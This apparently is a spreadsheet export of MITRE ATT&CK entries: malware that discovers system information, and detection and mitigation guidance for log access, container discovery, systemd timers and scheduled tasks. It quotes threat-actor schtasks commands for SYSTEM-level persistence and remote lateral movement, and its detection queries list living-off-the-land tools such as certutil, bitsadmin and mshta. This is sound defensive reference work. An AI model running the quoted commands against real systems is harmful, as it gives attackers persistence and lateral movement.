Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) has used commands and API calls to gather system information.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020)
Black Basta
[Black Basta](https://attack.mitre.org/software/S1070) can enumerate volumes and collect system boot configuration and CPU information.(Citation: Minerva Labs Black Basta May 2022)(Citation: Cyble Black Basta May 2022)
BlackCat
[BlackCat](https://attack.mitre.org/software/S1068) can obtain the computer name and UUID, and enumerate local drives.(Citation: Microsoft BlackCat Jun 2022)
BlackEnergy
[BlackEnergy](https://attack.mitre.org/software/S0089) has used [Systeminfo](https://attack.mitre.org/software/S0096) to gather the OS version, as well as information on the system configuration, BIOS, the motherboard, and the processor.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)
BlackMould
[BlackMould](https://attack.mitre.org/software/S0564) can enumerate local drives on a compromised host.(Citation: Microsoft GALLIUM December 2019)
Bonadan
[Bonadan](https://attack.mitre.org/software/S0486) has discovered the OS version, CPU model, and RAM size of the system it has been installed on.(Citation: ESET ForSSHe December 2018)
BoomBox
[BoomBox](https://attack.mitre.org/software/S0635) can enumerate the hostname, domain, and IP of a compromised host.(Citation: MSTIC Nobelium Toolset May 2021)
Brave Prince
[Brave Prince](https://attack.mitre.org/software/S0252) collects hard drive content and system configuration information.(Citation: McAfee Gold Dragon)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) can enumerate the OS version and domain on a targeted system.(Citation: Google EXOTIC LILY March 2022)(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)
Bundlore
[Bundlore](https://attack.mitre.org/software/S0482) will enumerate the macOS version to determine which follow-on behaviors to execute using &lt;code&gt;/usr/bin/sw_vers -productVersion&lt;/code&gt;.(Citation: MacKeeper Bundlore Apr 2019)(Citation: 20 macOS Common Tools and Techniques)
CARROTBAT
[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to determine the operating system of the compromised host and whether Windows is being run with x86 or x64 architecture.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)
CORESHELL
[CORESHELL](https://attack.mitre.org/software/S0137) collects hostname, volume serial number and OS version data from the victim and sends the information to its C2 server.(Citation: FireEye APT28)
CaddyWiper
[CaddyWiper](https://attack.mitre.org/software/S0693) can use `DsRoleGetPrimaryDomainInformation` to determine the role of the infected machine. [CaddyWiper](https://attack.mitre.org/software/S0693) can also halt execution if the compromised host is identified as a domain controller.(Citation: Cisco CaddyWiper March 2022)(Citation: Malwarebytes IssacWiper CaddyWiper March 2022 )
Cadelspy
[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to discover information about the compromised host.(Citation: Symantec Chafer Dec 2015)
Cannon
[Cannon](https://attack.mitre.org/software/S0351) can gather system information from the victim’s machine such as the OS version, machine name, and drive information.(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)
Carberp
[Carberp](https://attack.mitre.org/software/S0484) has collected the operating system version from the infected system.(Citation: Prevx Carberp March 2011)
Cardinal RAT
[Cardinal RAT](https://attack.mitre.org/software/S0348) can collect the hostname, Microsoft Windows version, and processor architecture from a victim machine.(Citation: PaloAlto CardinalRat Apr 2017)
Caterpillar WebShell
[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to gather information from the compromrised asset, including the computer version, computer name, IIS version, and more.(Citation: ClearSky Lebanese Cedar Jan 2021) 
ChChes
[ChChes](https://attack.mitre.org/software/S0144) collects the victim hostname, window resolution, and Microsoft Windows version.(Citation: Palo Alto menuPass Feb 2017)(Citation: PWC Cloud Hopper Technical Annex April 2017)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) has collected system information, including the machine name and OS version.(Citation: Cybereason Chaes Nov 2020)
CharmPower
[CharmPower](https://attack.mitre.org/software/S0674) can enumerate the OS version and computer name on a targeted system.(Citation: Check Point APT35 CharmPower January 2022)
Chrommme
[Chrommme](https://attack.mitre.org/software/S0667) has the ability to list drives and obtain the computer name of a compromised host.(Citation: ESET Gelsemium June 2021)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) can discover the hostname, computer name, and Windows version of a targeted machine.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)
Comnie
[Comnie](https://attack.mitre.org/software/S0244) collects the hostname of the victim machine.(Citation: Palo Alto Comnie)
CozyCar
A system info module in [CozyCar](https://attack.mitre.org/software/S0046) gathers information on the victim host’s configuration.(Citation: F-Secure CozyDuke)
CrackMapExec
[CrackMapExec](https://attack.mitre.org/software/S0488) can enumerate the system drives and associated system name.(Citation: CME Github September 2018)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) contains a command to collect the victim PC name, disk drive information, and operating system.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)
Cuba
[Cuba](https://attack.mitre.org/software/S0625) can enumerate local drives, disk type, and disk free space.(Citation: McAfee Cuba April 2021)
Cyclops Blink
[Cyclops Blink](https://attack.mitre.org/software/S0687) has the ability to query device information.(Citation: NCSC Cyclops Blink February 2022)
DEADEYE
[DEADEYE](https://attack.mitre.org/software/S1052) can enumerate a victim computer's volume serial number and host name.(Citation: Mandiant APT41)
DEATHRANSOM
[DEATHRANSOM](https://attack.mitre.org/software/S0616) can enumerate logical drives on a target system.(Citation: FireEye FiveHands April 2021)
DarkComet
[DarkComet](https://attack.mitre.org/software/S0334) can collect the computer name, RAM used, and operating system version from the victim’s machine.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066) can obtain system information by querying the `Win32_ComputerSystem`, `Win32_BIOS`, `Win32_MotherboardDevice`, `Win32_PnPEntity`, and `Win32_DiskDrive` WMI objects.(Citation: Secureworks DarkTortilla Aug 2022)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) can collect the OS version, system architecture, uptime, and computer name.(Citation: Prevailion DarkWatchman 2021)
Denis
[Denis](https://attack.mitre.org/software/S0354) collects OS information and the computer name from the victim’s machine.(Citation: Securelist Denis April 2017)(Citation: Cybereason Cobalt Kitty 2017)
Derusbi
[Derusbi](https://attack.mitre.org/software/S0021) gathers the name of the local host, version of GNU Compiler Collection (GCC), and the system information about the CPU, machine, and operating system.(Citation: Fidelis Turbo)
Diavol
[Diavol](https://attack.mitre.org/software/S0659) can collect the computer name and OS version from the system.(Citation: Fortinet Diavol July 2021)
DownPaper
[DownPaper](https://attack.mitre.org/software/S0186) collects the victim host name and serial number, and then sends the information to the C2 server.(Citation: ClearSky Charming Kitten Dec 2017)
Dridex
[Dridex](https://attack.mitre.org/software/S0384) has collected the computer name and OS architecture information from the system.(Citation: Checkpoint Dridex Jan 2021)
DropBook
[DropBook](https://attack.mitre.org/software/S0547) has checked for the presence of Arabic language in the infected machine's settings.(Citation: Cybereason Molerats Dec 2020) 
Dtrack
[Dtrack](https://attack.mitre.org/software/S0567) can collect the victim's computer name, hostname and adapter information to create a unique identifier.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)
DustySky
[DustySky](https://attack.mitre.org/software/S0062) extracts basic information about the operating system.(Citation: DustySky)
Dyre
[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify the computer name, OS version, and hardware configuration on a compromised host.(Citation: Malwarebytes Dyreza November 2015)
EVILNUM
[EVILNUM](https://attack.mitre.org/software/S0568) can obtain the computer name from the victim's system.(Citation: Prevailion EvilNum May 2020)
Egregor
[Egregor](https://attack.mitre.org/software/S0554) can perform a language check of the infected system and can query the CPU information (cupid).(Citation: JoeSecurity Egregor 2020)(Citation: NHS Digital Egregor Nov 2020)
Elise
[Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;systeminfo&lt;/code&gt; after initial communication is made to the remote server.(Citation: Lotus Blossom Jun 2015)
Emissary
[Emissary](https://attack.mitre.org/software/S0082) has the capability to execute ver and systeminfo commands.(Citation: Emissary Trojan Feb 2016)
Empire
[Empire](https://attack.mitre.org/software/S0363) can enumerate host system information like OS, architecture, domain name, applied patches, and more.(Citation: Github PowerShell Empire)(Citation: Talos Frankenstein June 2019)
EnvyScout
[EnvyScout](https://attack.mitre.org/software/S0634) can determine whether the ISO payload was received by a Windows or iOS device.(Citation: MSTIC Nobelium Toolset May 2021)
Epic
[Epic](https://attack.mitre.org/software/S0091) collects the OS version, hardware information, computer name, available system memory status, disk space information, and system and user language settings.(Citation: Kaspersky Turla Aug 2014)
Explosive
[Explosive](https://attack.mitre.org/software/S0569) has collected the computer name from the infected host.(Citation: CheckPoint Volatile Cedar March 2015) 
FALLCHILL
[FALLCHILL](https://attack.mitre.org/software/S0181) can collect operating system (OS) version information, processor information, system name, and information about installed disks from the victim.(Citation: US-CERT FALLCHILL Nov 2017)
FELIXROOT
[FELIXROOT](https://attack.mitre.org/software/S0267) collects the victim’s computer name, processor architecture, OS version, volume serial number, and system type.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)
FatDuke
[FatDuke](https://attack.mitre.org/software/S0512) can collect the user name, Windows version, computer name, and available space on discs from a compromised host.(Citation: ESET Dukes October 2019)
Felismus
[Felismus](https://attack.mitre.org/software/S0171) collects the system information, including hostname and OS version, and sends it to the C2 server.(Citation: Forcepoint Felismus Mar 2017)
Ferocious
[Ferocious](https://attack.mitre.org/software/S0679) can use &lt;code&gt;GET.WORKSPACE&lt;/code&gt; in Microsoft Excel to determine the OS version of the compromised host.(Citation: Kaspersky WIRTE November 2021)
FinFisher
[FinFisher](https://attack.mitre.org/</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor for the use of commands and arguments of utilities and other tools used to access and export logs.
File Access
Monitor for access to system and service log files, especially from unexpected and abnormal users.
Process Creation
Monitor for unexpected process activity associated with utilities that can access and export logs, such as `wevutil.exe` on Windows and `CollectGuestLogs.exe` on Azure hosted VMs.
User Account Management
Limit the ability to access and export sensitive logs to privileged accounts where possible.
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has used `wevtutil.exe` and the PowerShell command `Get-EventLog security` to enumerate Windows logs to search for successful logons.(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)
Pacu
[Pacu](https://attack.mitre.org/software/S1091) can collect CloudTrail event histories and CloudWatch logs.(Citation: GitHub Pacu)
</t>
  </si>
  <si>
    <t xml:space="preserve">Container Enumeration
Monitor logs for actions that could be taken to gather information about container infrastructure, including the use of discovery API calls by new or unexpected users. Monitor account activity logs to see actions performed and activity associated with the Kubernetes dashboard and other web applications.
Pod Enumeration
Monitor logs for actions that could be taken to gather information about pods, including the use of discovery API calls by new or unexpected users. Monitor account activity logs to see actions performed and activity associated with the Kubernetes dashboard and other web applications.
Limit Access to Resource Over Network
Limit communications with the container service to managed and secured channels, such as local Unix sockets or remote access via SSH. Require secure port access to communicate with the APIs over TLS by disabling unauthenticated access to the Docker API and Kubernetes API Server.(Citation: Docker Daemon Socket Protect)(Citation: Kubernetes API Control Access) In Kubernetes clusters deployed in cloud environments, use native cloud platform features to restrict the IP ranges that are permitted to access to API server.(Citation: Kubernetes Cloud Native Security) Where possible, consider enabling just-in-time (JIT) access to the Kubernetes API to place additional restrictions on access.(Citation: Microsoft AKS Azure AD 2023)
Network Segmentation
Deny direct remote access to internal systems through the use of network proxies, gateways, and firewalls.
User Account Management
Enforce the principle of least privilege by limiting dashboard visibility to only the required users. When using Kubernetes, avoid giving users wildcard permissions or adding users to the `system:masters` group, and use `RoleBindings` rather than `ClusterRoleBindings` to limit user privileges to specific namespaces.(Citation: Kubernetes RBAC)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has checked for running containers with &lt;code&gt;docker ps&lt;/code&gt; and for specific container names with &lt;code&gt;docker inspect&lt;/code&gt;.(Citation: Trend Micro TeamTNT) [TeamTNT](https://attack.mitre.org/groups/G0139) has also searched for Kubernetes pods running in a local network.(Citation: Cisco Talos Intelligence Group)
Hildegard
[Hildegard](https://attack.mitre.org/software/S0601) has used masscan to search for kubelets and the kubelet API for additional running containers.(Citation: Unit 42 Hildegard Malware) 
Peirates
[Peirates](https://attack.mitre.org/software/S0683) can enumerate Kubernetes pods in a given namespace.(Citation: Peirates GitHub)
</t>
  </si>
  <si>
    <t xml:space="preserve">Container Creation
Monitor for newly constructed containers
File Creation
Monitor for newly constructed files by using the logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application and resource pods to monitor malicious container orchestration job deployments.
Scheduled Job Creation
Monitor for the anomalous creation of scheduled jobs in container orchestration environments.
Privileged Account Management
Ensure containers are not running as root by default. In Kubernetes environments, consider defining Pod Security Standards that prevent pods from running privileged containers.(Citation: Kubernetes Hardening Guide)
User Account Management
Limit privileges of user accounts and remediate privilege escalation vectors so only authorized administrators can create container orchestration jobs.
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments the 'systemd-run' utility as it may be used to create timers
File Modification
Monitor for changes made to systemd timer unit files for unexpected modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links
Process Creation
Monitor for newly constructed processes and/or command-lines that will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
Scheduled Job Creation
Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables.
Privileged Account Management
Limit access to the root account and prevent users from creating and/or modifying systemd timer unit files. 
Restrict File and Directory Permissions
Restrict read/write access to systemd &lt;code&gt;.timer&lt;/code&gt; unit files to only select privileged users who have a legitimate need to manage system services.
User Account Management
Limit user access to system utilities such as 'systemctl' or 'systemd-run' to users who have a legitimate need.
</t>
  </si>
  <si>
    <t>Command Execution
Monitor executed commands and arguments for actions that could be taken to gather tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.
&lt;h4&gt; Analytic 1 : New processes whose command line includes commands that create or modify scheduled tasks with a suspicious script, extension or user writable path &lt;/h4&gt;
&lt;code&gt; suspicious_processes = filter ProcessId, ProcessFilePath, command_line, ProcessParentFilePath,ProcessParentCommandLine where
  (EventId == "1" OR EventId == "4688") AND
  command_line LIKE '%SCHTASKS%' AND
  (command_line LIKE '%/CREATE%' OR command_line LIKE '%/CHANGE%') AND
  (command_line LIKE '%.cmd%' OR command_line LIKE '%.ps1%' OR
   command_line LIKE '%.vbs%' OR command_line LIKE '%.py%' OR
   command_line LIKE '%.js%' OR command_line LIKE '%.exe%' OR
   command_line LIKE '%.bat%' OR command_line LIKE '%javascript%' OR
   command_line LIKE '%powershell%' OR command_line LIKE '%rundll32%' OR
   command_line LIKE '%wmic%' OR command_line LIKE '%cmd%' OR
   command_line LIKE '%cscript%' OR command_line LIKE '%wscript%' OR
   command_line LIKE '%regsvr32%' OR command_line LIKE '%mshta%' OR
   command_line LIKE '%bitsadmin%' OR command_line LIKE '%certutil%' OR
   command_line LIKE '%msiexec%' OR command_line LIKE '%javaw%' OR
   command_line LIKE '%[%]APPDATA[%]%' OR command_line LIKE '%\\AppData\\Roaming%' OR
   command_line LIKE '%[%]PUBLIC[%]%' OR command_line LIKE '%C:\\Users\\Public%' OR
   command_line LIKE '%[%]ProgramData[%]%' OR command_line LIKE '%C:\\ProgramData%' OR
   command_line LIKE '%[%]TEMP[%]%' OR command_line LIKE '%\\AppData\\Local\\Temp%' OR
   command_line LIKE '%\\Windows\\PLA\\System%' OR command_line LIKE '%\\tasks%' OR
   command_line LIKE '%\\Registration\\CRMLog%' OR command_line LIKE '%\\FxsTmp%' OR
   command_line LIKE '%\\spool\\drivers\\color%' OR command_line LIKE '%\\tracing%' OR)&lt;/code&gt;
File Creation
Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. In order to gain persistence, privilege escalation, or remote execution, an adversary may use the Windows Task Scheduler to schedule a command to be run at a specified time, date, and even host. Task Scheduler stores tasks as files in two locations - C:\Windows\Tasks (legacy) or C:\Windows\System32\Tasks. Accordingly, this analytic looks for the creation of task files in these two locations.
&lt;h4&gt;Analytic 1 - Scheduled Task - File Creation &lt;/h4&gt;
&lt;code&gt;task_files = filter files where (
  (file_path = "C:\Windows\System32\Tasks\*" or file_path = "C:\Windows\Tasks\*")  and
  image_path != "C:\WINDOWS\system32\svchost.exe")&lt;/code&gt;
File Modification
Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
Network Traffic Flow
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Look for RPC traffic after being mapped, which implies a destination port of at least 49152. If network inspection is available via packet captures or a NIDS, then traffic through the &lt;code&gt;ITaskSchedulerService&lt;/code&gt; interface can be detected. Microsoft has a list of the possible methods that are implemented for the &lt;code&gt;ITaskSchedulerService&lt;/code&gt; interface, which may be useful in differentiating read and query operations from creations and modifications.
When scheduled tasks are created remotely, Windows uses RPC (135/tcp) to communicate with the Task Scheduler on the remote machine. Once an RPC connection is established, the client communicates with the Scheduled Tasks endpoint, which runs within the service group netsvcs. With packet capture and the right packet decoders or byte-stream based signatures, remote invocations of these functions can be identified.
Certain strings can be identifiers of the schtasks, by looking up the interface UUID of ITaskSchedulerService in different formats
- UUID &lt;code&gt;86d35949-83c9-4044-b424-db363231fd0c&lt;/code&gt; (decoded)
- Hex &lt;code&gt;49 59 d3 86 c9 83 44 40 b4 24 db 36 32 31 fd 0c&lt;/code&gt; (raw)
- ASCII &lt;code&gt;IYD@$621&lt;/code&gt; (printable bytes only)
This identifier is present three times during the RPC request phase. Any sensor that has access to the byte code as raw, decoded, or ASCII could implement this analytic.
&lt;h4&gt;Analytic 1 - Remotely Scheduled Tasks via Schtasks&lt;/h4&gt;
&lt;code&gt; schtasks_rpc = filter flows where (src_port &gt;= 49152 AND dest_port &gt;= 49152 AND proto_info.rpc_interface == "ITaskSchedulerService")
sch_create = filter flows where (proto_info.function == “SchRpcRegisterTask” OR proto_info.function == “SchRpcRun” OR proto_info.function == “SchRpcEnableTask”) &lt;/code&gt;
Process Creation
Monitor for newly constructed processes and/or command-lines that execute from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Look for instances of &lt;code&gt; schtasks.exe &lt;/code&gt; running as processes. The &lt;code&gt; command_line &lt;/code&gt; field is necessary to disambiguate between types of schtasks commands. These include the flags &lt;code&gt;/create &lt;/code&gt;,&lt;code&gt; /run&lt;/code&gt;,&lt;code&gt; /query&lt;/code&gt;,&lt;code&gt; /delete&lt;/code&gt;,&lt;code&gt; /change&lt;/code&gt;, and &lt;code&gt; /end&lt;/code&gt;.
Detection of the creation or modification of Scheduled Tasks with a suspicious script, extension or user writable path. Attackers may create or modify Scheduled Tasks for the persistent execution of malicious code. This detection focuses at the same time on EventIDs 4688 and 1 with process creation (SCHTASKS) and EventID 4698, 4702 for Scheduled Task creation/modification event log.
&lt;h4&gt; Analytic 1 - New processes whose parent processes are svchost.exe or taskeng.exe&lt;/h4&gt;
&lt;code&gt; suspicious_processes = filter ProcessId, ProcessFilePath, ProcessParentFilePath where
  (EventId == "1" OR EventId == "4688") AND
  (ProcessParentFilePath LIKE '%svchost.exe%' OR ProcessParentFilePath LIKE '%taskeng.exe%')&lt;/code&gt;
&lt;h4&gt; Analytic 2 - Scheduled Task Creation or Modification Containing Suspicious Scripts, Extensions or User Writable Paths &lt;/h4&gt;
&lt;code&gt;susp_tasks_processes = filter processes where command_line CONTAINS("*SCHTASKS*") 
AND (command_line CONTAINS("*/CREATE*") OR command_line CONTAINS("*/CHANGE*")) 
AND (command_line CONTAINS("*.cmd*") OR command_line CONTAINS("*.ps1*") OR command_line CONTAINS("*.vbs*") OR command_line CONTAINS("*.py*") OR command_line CONTAINS("*.js*") OR command_line CONTAINS("*.exe*") OR command_line CONTAINS("*.bat*") OR (command_line CONTAINS("*javascript*") OR command_line CONTAINS("*powershell*") OR command_line CONTAINS("*wmic*") OR command_line CONTAINS("*rundll32*") OR command_line CONTAINS("*cmd*") OR command_line CONTAINS("*cscript*") OR command_line CONTAINS("*wscript*") OR command_line CONTAINS("*regsvr32*") OR command_line CONTAINS("*mshta*") OR command_line CONTAINS("*bitsadmin*") OR command_line CONTAINS("*certutil*") OR command_line CONTAINS("*msiexec*") OR command_line CONTAINS("*javaw*") OR (command_line CONTAINS("*%APPDATA%*") OR command_line CONTAINS("*\\AppData\\Roaming*") OR command_line CONTAINS("*%PUBLIC%*") OR command_line CONTAINS("*C:\\Users\\Public*") OR command_line CONTAINS("*%ProgramData%*") OR command_line CONTAINS("*C:\\ProgramData*") OR command_line CONTAINS("*%TEMP%*") OR command_line CONTAINS("*\\AppData\\Local\\Temp*") OR command_line CONTAINS("*\\Windows\\PLA\\System*") OR command_line CONTAINS("*\\tasks*") OR command_line CONTAINS("*\\Registration\\CRMLog*") OR command_line CONTAINS("*\\FxsTmp*") OR command_line CONTAINS("*\\spool\\drivers\\color*") OR command_line CONTAINS("*\\tracing*"))))
tasks = search Task:create
susp_tasks = filter tasks where (task_content CONTAINS("*.cmd*") OR task_content CONTAINS("*.ps1*") OR task_content CONTAINS("*.vbs*") OR task_content CONTAINS("*.py*") OR task_content CONTAINS("*.js*") OR task_content CONTAINS("*.exe*") OR task_content CONTAINS("*.bat*") OR (task_content CONTAINS("*javascript*") OR task_content CONTAINS("*powershell*") OR task_content CONTAINS("*wmic*") OR task_content CONTAINS("*rundll32*") OR task_content CONTAINS("*cmd*") OR task_content CONTAINS("*cscript*") OR task_content CONTAINS("*wscript*") OR task_content CONTAINS("*regsvr32*") OR task_content CONTAINS("*mshta*") OR task_content CONTAINS("*bitsadmin*") OR task_content CONTAINS("*certutil*") OR task_content CONTAINS("*msiexec*") OR task_content CONTAINS("*javaw*") OR (task_content CONTAINS("*%APPDATA%*") OR task_content CONTAINS("*\\AppData\\Roaming*") OR task_content CONTAINS("*%PUBLIC%*") OR task_content CONTAINS("*C:\\Users\\Public*") OR task_content CONTAINS("*%ProgramData%*") OR task_content CONTAINS("*C:\\ProgramData*") OR task_content CONTAINS("*%TEMP%*") OR task_content CONTAINS("*\\AppData\\Local\\Temp*") OR task_content CONTAINS("*\\Windows\\PLA\\System*") OR task_content CONTAINS("*\\tasks*") OR task_content CONTAINS("*\\Registration\\CRMLog*") OR task_content CONTAINS("*\\FxsTmp*") OR task_content CONTAINS("*\\spool\\drivers\\color*") OR task_content CONTAINS("*\\tracing*"))))&lt;/code&gt;
Scheduled Job Creation
Monitor for newly constructed scheduled jobs by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered; Event ID 4698 on Windows 10, Server 2016 - Scheduled task created;
Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled;
Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled
Note: Detection of the creation or modification of Scheduled Tasks with a suspicious script, extension or user writable path. Attackers may create or modify Scheduled Tasks for the persistent execution of malicious code. This detection focuses at the same time on EventIDs 4688 and 1 with process creation (SCHTASKS) and EventID 4698, 4702 for Scheduled Task creation/modification event log.
&lt;h4&gt; Analytic 1 : New schedule tasks whose content includes suspicious scripts, extensions or user writable path&lt;/h4&gt;
&lt;code&gt; suspicious_scheduled_jobs = filter UserName, JobName, JobContent where
  EventId == "4698" AND
  (JobContent LIKE '%.cmd%' OR JobContent LIKE '%.ps1%' OR
   JobContent LIKE '%.vbs%' OR JobContent LIKE '%.py%' OR
   JobContent LIKE '%.js%' OR JobContent LIKE '%.exe%' OR
   JobContent LIKE '%.bat%' OR JobContent LIKE '%javascript%' OR
   JobContent LIKE '%powershell%' OR JobContent LIKE '%wmic%' OR
   JobContent LIKE '%rundll32%' OR JobContent LIKE '%cmd%' OR
   JobContent LIKE '%cscript%' OR JobContent LIKE '%wscript%' OR
   JobContent LIKE '%regsvr32%' OR JobContent LIKE '%mshta%' OR
   JobContent LIKE '%bitsadmin%' OR JobContent LIKE '%certutil%' OR
   JobContent LIKE '%msiexec%' OR JobContent LIKE '%javaw%' OR
   JobContent LIKE '%[%]APPDATA[%]%' OR JobContent LIKE '%\\AppData\\Roaming%' OR
   JobContent LIKE '%[%]PUBLIC[%]%' OR JobContent LIKE '%C:\\Users\\Public%' OR
   JobContent LIKE '%[%]ProgramData[%]%' OR JobContent LIKE '%C:\\ProgramData%' OR
   JobContent LIKE '%[%]TEMP[%]%' OR JobContent LIKE '%\\AppData\\Local\\Temp%' OR
   JobContent LIKE '%\\Windows\\PLA\\System%' OR JobContent LIKE '%\\tasks%' OR
   JobContent LIKE '%\\Registration\\CRMLog%' OR JobContent LIKE '%\\FxsTmp%' OR
   JobContent LIKE '%\\spool\\drivers\\color%' OR JobContent LIKE '%\\tracing%')&lt;/code&gt;
Windows Registry Key Creation
Monitor for newly constructed registry keys upon creation of new task. Deletion of values/keys in the registry may further indicate malicious activity.
Note: Sysmon event id 12 is used in the analytic
&lt;h4&gt;Analytic 1 : Suspicious Creations under Schedule Registry Key &lt;/h4&gt;
&lt;code&gt; suspicious_processes = filter ProcessGuid, ProcessFilePath, RegistryKeyPath, UserName where event_id == "12" AND
  (RegistryKeyPath LIKE '%HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks%' OR 
   RegistryKeyPath LIKE '%HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree%')&lt;/code&gt;
Audit
Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for permission weaknesses in scheduled tasks that could be used to escalate privileges. (Citation: Powersploit)
Operating System Configuration
Configure settings for scheduled tasks to force tasks to run under the context of the authenticated account instead of allowing them to run as SYSTEM. The associated Registry key is located at HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SubmitControl. The setting can be configured through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; Security Options: Domain Controller: Allow server operators to schedule tasks, set to disabled. (Citation: TechNet Server Operator Scheduled Task)
Privileged Account Management
Configure the Increase Scheduling Priority option to only allow the Administrators group the rights to schedule a priority process. This can be configured through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Increase scheduling priority. (Citation: TechNet Scheduling Priority)
User Account Management
Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create scheduled tasks on remote systems. 
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: `\Microsoft\Windows\PLA\Server Manager Performance Monitor`, `\Microsoft\Windows\Ras\ManagerMobility`, `\Microsoft\Windows\WDI\SrvSetupResults`, and `\Microsoft\Windows\WDI\USOShared`.(Citation: Mandiant APT41) 
CostaRicto
During [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors used scheduled tasks to download backdoor tools.(Citation: BlackBerry CostaRicto November 2020) 
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors established persistence through a scheduled task using the command: `/Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR`, named "WinUpdate" (Citation: Talos Frankenstein June 2019)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used scheduled tasks to execute batch scripts for lateral movement with the following command: `SCHTASKS /Create /S &lt;IP Address&gt; /U &lt;Username&gt; /p &lt;Password&gt; /SC ONCE /TN test /TR &lt;Path to a Batch File&gt; /ST &lt;Time&gt; /RU SYSTEM.`(Citation: Cybereason OperationCuckooBees May 2022)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) created scheduled tasks to set a periodic execution of a remote XSL script.(Citation: ESET Lazarus Jun 2020)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used scheduled tasks to execute malicious PowerShell code on remote systems.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used `scheduler` and `schtasks` to create new tasks on remote host as part of their lateral movement. They manipulated scheduled tasks by updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration. [APT29](https://attack.mitre.org/groups/G0016) also created a scheduled task to maintain [SUNSPOT](https://attack.mitre.org/software/S0562) persistence when the host booted.(Citation: Volexity SolarWinds)(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: CrowdStrike SUNSPOT Implant January 2021)
APT-C-36
[APT-C-36](https://attack.mitre.org/groups/G0099) has used a macro function to set scheduled tasks, disguised as those used by Google.(Citation: QiAnXin APT-C-36 Feb2019)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has used named and hijacked scheduled tasks to establish persistence.(Citation: Mandiant No Easy Breach)
APT3
An [APT3](https://attack.mitre.org/groups/G0022) downloader creates persistence by creating the following scheduled task: &lt;code&gt;schtasks /create /tn "mysc" /tr C:\Users\Public\test.exe /sc ONLOGON /ru "System"&lt;/code&gt;.(Citation: FireEye Operation Double Tap)
APT32
